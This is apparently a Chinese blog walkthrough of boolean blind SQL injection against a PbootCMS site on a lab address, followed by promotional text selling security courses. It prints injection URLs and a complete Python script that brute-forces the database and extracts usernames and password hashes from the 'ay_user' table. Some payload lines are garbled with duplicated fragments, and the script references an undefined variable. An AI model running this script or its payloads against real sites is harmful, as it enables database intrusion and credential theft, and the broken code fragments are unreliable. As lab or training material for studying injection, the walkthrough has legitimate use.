pbootcms网站实战攻略_pbootcms 乘法

代替  
http://10.10.5.79:8088/?case/14’) and 1 = 1.html and 1 = 1.html")  来判断注入点

访问  
http://10.10.5.79:8088/?case/14%27)")
%09and%091%3d2%23.html

判断数据库长度，使用length()函数，构造语句：
http://10.10.5.79:8088/?case/14
%27)%09and%09length(database())%3d1%23.html%09and%09length(database())%3d1%23.html")，

当等于1时返回空，将数据改为8，返回正常，说明数据库的长度为8

开始修改bool.py脚本，在脚本内容中修改参数，利用构造的盲注语句修改脚本中的语句

这里根据提示，用御剑扫描网站后台，有一个.zip后缀名的数据包，访问后发现数据库文件，找到存储password的表文件为’ay_user’，这里更改content内容表内容，直接跑出content结果。

这里附上Python脚本源码：

import requests
import string

class GetInject:
    chr_str = string.ascii_lowercase + string.punctuation + string.digits 
    def __init__(self,url,mark,obj):
        '''
        obj参数举例:
        obj = "database()"
        obj = "select table_name from information_schema.tables where table_schema=database() limit 0,1"
        '''
        self.url = url
        self.mark = mark
        self.obj = obj
    
    def get_length(self):
        payload_len = "14')%09and%09length({0})%3d{1}%23.html"
        #如果实例参数是双引号型或者整数型，修改payload格式
        i = 1
        while True:
            payload_len_i = payload_len.format(self.obj,i)
            r = requests.get(self.url+payload_len_i)
            if self.mark in r.text:
                print("len",i)
                return i
            i += 1

    def get_name(self):
        name_len = self.get_length()
        payload_name = "14')%09and%09substr({0},{1},1)%3d'{2}'%23.html"
        #payload_name = "14')%09and%09length({0})%3d{1}%23"
        output = ''
        for i in range(1,name_len + 1):
            for c in self.chr_str:  # 直接枚举
                payload_name_i = payload_name.format(self.obj,i,c)
                r = requests.get(url+payload_name_i)
                if self.mark in r.text:
                    output += c
                    print(output)
                    break
        return output

# mark 是判断为True还是False的标志，这里是you are in
url = "http://10.10.5.79:8088/?case/"
mark = "<title>湖南翱云网络科技有限公司-服务案例-PbootCMS-永久开源免费的PHP企业网站开发建设管理系统</title>"
#tables = "(select group_concat(table_name) from information_schema.tables where table_schema=database())"
#columns = "(select group_concat(column_name) from information_schema.columns where table_schema=database())"
content = "(select%09group_concat(username,':',password)%09from%09ay_user)"

database = "database()"
test1 = GetInject(url,mark,content)
test1.get_name()


**自我介绍一下，小编13年上海交大毕业，曾经在小公司待过，也去过华为、OPPO等大厂，18年进入阿里一直到现在。**

**深知大多数网络安全工程师，想要提升技能，往往是自己摸索成长，但自己不成体系的自学效果低效又漫长，而且极易碰到天花板技术停滞不前！**

**因此收集整理了一份《2024年网络安全全套学习资料》，初衷也很简单，就是希望能够帮助到想自学提升又不知道该从何学起的朋友。**
![img](https://img-blog.csdnimg.cn/img_convert/5b29314e416e400767b27d5b0c3d95b4.png)
![img](https://img-blog.csdnimg.cn/img_convert/c6f62b5e4016fe6689356bba47d7d118.png)
![img](https://img-blog.csdnimg.cn/img_convert/42feef0bb28b25a359b614bcd586d9a1.png)
![img](https://img-blog.csdnimg.cn/img_convert/3faad0b2700e8f5ca6f3fc54d481c6f5.png)
![img](https://img-blog.csdnimg.cn/img_convert/bd43647d9787945ded0b55351a3b86be.png)
![img](https://img-blog.csdnimg.cn/img_convert/d12a57b724eea026a10d3824c56ccccc.png)

**既有适合小白学习的零基础资料，也有适合3年以上经验的小伙伴深入学习提升的进阶课程，基本涵盖了95%以上网络安全知识点，真正体系化！**

**由于文件比较大，这里只是将部分目录大纲截图出来，每个节点里面都包含大厂面经、学习笔记、源码讲义、实战项目、讲解视频，并且后续会持续更新**

**如果你觉得这些内容对你有帮助，可以添加VX：vip204888 （备注网络安全获取）**
![img](https://img-blog.csdnimg.cn/img_convert/8596fdbd37c36147bc598f183304d270.png)



### 给大家的福利


**零基础入门**


对于从来没有接触过网络安全的同学，我们帮你准备了详细的学习成长路线图。可以说是最科学最系统的学习路线，大家跟着这个大的方向学习准没问题。


![](https://img-blog.csdnimg.cn/img_convert/95608e9062782d28f4f04f821405d99a.png)


同时每个成长路线对应的板块都有配套的视频提供：


![在这里插入图片描述](https://img-blog.csdnimg.cn/direct/a91b9e8100834e9291cfcf1695d8cd42.png#pic_center)


因篇幅有限，仅展示部分资料

**一个人可以走的很快，但一群人才能走的更远。不论你是正从事IT行业的老鸟或是对IT行业感兴趣的新人，都欢迎扫码加入我们的的圈子（技术交流、学习资源、职场吐槽、大厂内推、面试辅导），让我们一起学习成长！**
![img](https://img-blog.csdnimg.cn/img_convert/4144aeb23f12770f3f1f84b0ceb01e90.png)


**一个人可以走的很快，但一群人才能走的更远。不论你是正从事IT行业的老鸟或是对IT行业感兴趣的新人，都欢迎扫码加入我们的的圈子（技术交流、学习资源、职场吐槽、大厂内推、面试辅导），让我们一起学习成长！**
[外链图片转存中...(img-gkfMpHpH-1712855053544)]